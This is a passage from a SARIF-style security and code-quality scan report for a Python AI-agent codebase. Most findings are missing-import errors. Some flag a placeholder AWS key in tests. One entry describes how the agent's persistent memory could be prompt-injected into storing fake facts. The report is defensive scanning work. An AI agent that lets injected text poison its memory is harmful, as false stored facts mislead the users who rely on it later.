"SEC004", "scanner": "repobility-threat-engine", "confidence": 0.5, "correlation_key": "code|injection|token|99|sec004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/notebook_edit.py"}, "region": {"startLine": 99}}}]}, {"ruleId": "AGT002", "level": "error", "message": {"text": "LLM memory extraction can be prompt-injected into storing fake facts"}, "properties": {"repobilityId": 7251, "scanner": "repobility-agent-runtime", "fingerprint": "c07e3fb57544f5a4ecfc0f9a2d464e83041786f72627905e5cb2313ba90d987f", "category": "llm_injection", "severity": "high", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File appears to persist LLM-extracted memory from user/assistant exchanges without visible schema validation or prompt-pattern rejection.", "evidence": {"rule_id": "AGT002", "scanner": "repobility-agent-runtime", "data_flow": "chat_exchange_to_persistent_memory", "references": ["https://owasp.org/www-project-top-10-for-large-language-model-applications/"], "correlation_key": "fp|c07e3fb57544f5a4ecfc0f9a2d464e83041786f72627905e5cb2313ba90d987f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/xaa_idp_login.py"}, "region": {"startLine": 1}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `stat` used but not imported"}, "properties": {"repobilityId": 46452, "scanner": "repobility-ast-engine", "fingerprint": "1d9c3ad421f1d7c5db970a65450b46dabd7fd0c51779ca770e0c0c970056e07f", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1d9c3ad421f1d7c5db970a65450b46dabd7fd0c51779ca770e0c0c970056e07f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/read.py"}, "region": {"startLine": 327}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `glob` used but not imported"}, "properties": {"repobilityId": 46451, "scanner": "repobility-ast-engine", "fingerprint": "78f9cfeedad52a65138f38c765e24127acb758f3e7c0c791c4b4883a7fdb1989", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|78f9cfeedad52a65138f38c765e24127acb758f3e7c0c791c4b4883a7fdb1989"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/grep.py"}, "region": {"startLine": 59}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `warnings` used but not imported"}, "properties": {"repobilityId": 46450, "scanner": "repobility-ast-engine", "fingerprint": "8f9508d0e28b43ec9d8306b825c910936389a6b8402b77c608281258ca12aba4", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8f9508d0e28b43ec9d8306b825c910936389a6b8402b77c608281258ca12aba4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/doctor.py"}, "region": {"startLine": 122}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `stat` used but not imported"}, "properties": {"repobilityId": 46449, "scanner": "repobility-ast-engine", "fingerprint": "471e5889a6528edb4204a160ea0a5f2c8dcf5246cdadb269023a2ff44611d07e", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|471e5889a6528edb4204a160ea0a5f2c8dcf5246cdadb269023a2ff44611d07e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/memdir/memory_scan.py"}, "region": {"startLine": 148}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `warnings` used but not imported"}, "properties": {"repobilityId": 46448, "scanner": "repobility-ast-engine", "fingerprint": "2810aa0b873f5343a4f6b964e6215e3b0327fecb4051c7e01ea1736b9fda6b5b", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|2810aa0b873f5343a4f6b964e6215e3b0327fecb4051c7e01ea1736b9fda6b5b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/setup.py"}, "region": {"startLine": 154}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `warnings` used but not imported"}, "properties": {"repobilityId": 46447, "scanner": "repobility-ast-engine", "fingerprint": "e270356163813e47b5c45b8132a9eae26227c76fac3c8c48b7c0f224714decd7", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e270356163813e47b5c45b8132a9eae26227c76fac3c8c48b7c0f224714decd7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/session_resume.py"}, "region": {"startLine": 77}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `stat` used but not imported"}, "properties": {"repobilityId": 46444, "scanner": "repobility-ast-engine", "fingerprint": "dba749629345adbae36de7d5d9ed42f3097818bb190a240f40f86add647d2c6c", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|dba749629345adbae36de7d5d9ed42f3097818bb190a240f40f86add647d2c6c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/context.py"}, "region": {"startLine": 237}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `queue` used but not imported"}, "properties": {"repobilityId": 46431, "scanner": "repobility-ast-engine", "fingerprint": "1ee3fd8dfdcb9d68e8a3505cc99bb35a5630d7e67cd4f2b093634fa97831cbc6", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1ee3fd8dfdcb9d68e8a3505cc99bb35a5630d7e67cd4f2b093634fa97831cbc6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/plugins/dependency.py"}, "region": {"startLine": 74}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `select` used but not imported"}, "properties": {"repobilityId": 46430, "scanner": "repobility-ast-engine", "fingerprint": "ccba7eba6713bb292dea0707840cca277ee9419b09527d0b82a700bcf1182227", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ccba7eba6713bb292dea0707840cca277ee9419b09527d0b82a700bcf1182227"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/tui/test_a11y.py"}, "region": {"startLine": 199}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `io` used but not imported"}, "properties": {"repobilityId": 46429, "scanner": "repobility-ast-engine", "fingerprint": "a8b74c31f625e1f25340f6db88b64daedbec832ce567af257df414c8856a082e", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a8b74c31f625e1f25340f6db88b64daedbec832ce567af257df414c8856a082e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/transports/test_remote_io.py"}, "region": {"startLine": 452}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 46427, "scanner": "repobility-ast-engine", "fingerprint": "d49e9a8a75bf1655c853db79445df45eb14ae62e5755e4efbf8c3793f240838c", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d49e9a8a75bf1655c853db79445df45eb14ae62e5755e4efbf8c3793f240838c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_abort_controller_once.py"}, "region": {"startLine": 26}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 46425, "scanner": "repobility-ast-engine", "fingerprint": "5694f6bd7b1df7dad65be0d619dd10273f59f92f596755bff19012b3fda845f2", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5694f6bd7b1df7dad65be0d619dd10273f59f92f596755bff19012b3fda845f2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_abort_controller.py"}, "region": {"startLine": 15}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 46422, "scanner": "repobility-ast-engine", "fingerprint": "2cdd9e86baa2d305c308b957847ab80ba10e5bff44498f03083a0bce06935779", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|2cdd9e86baa2d305c308b957847ab80ba10e5bff44498f03083a0bce06935779"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_esc_cancel_propagation.py"}, "region": {"startLine": 128}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16600, "scanner": "repobility", "fingerprint": "8b9a532ef76b463438a6e759ab48deb1", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_auth.py"}, "region": {"startLine": 130}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16599, "scanner": "repobility", "fingerprint": "fc191428117b5fdcdb75624014f29c07", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_auth.py"}, "region": {"startLine": 125}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16598, "scanner": "repobility", "fingerprint": "46e214a85dd15c5996dbdc220b143612", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_auth.py"}, "region": {"startLine": 117}}}]}]}]}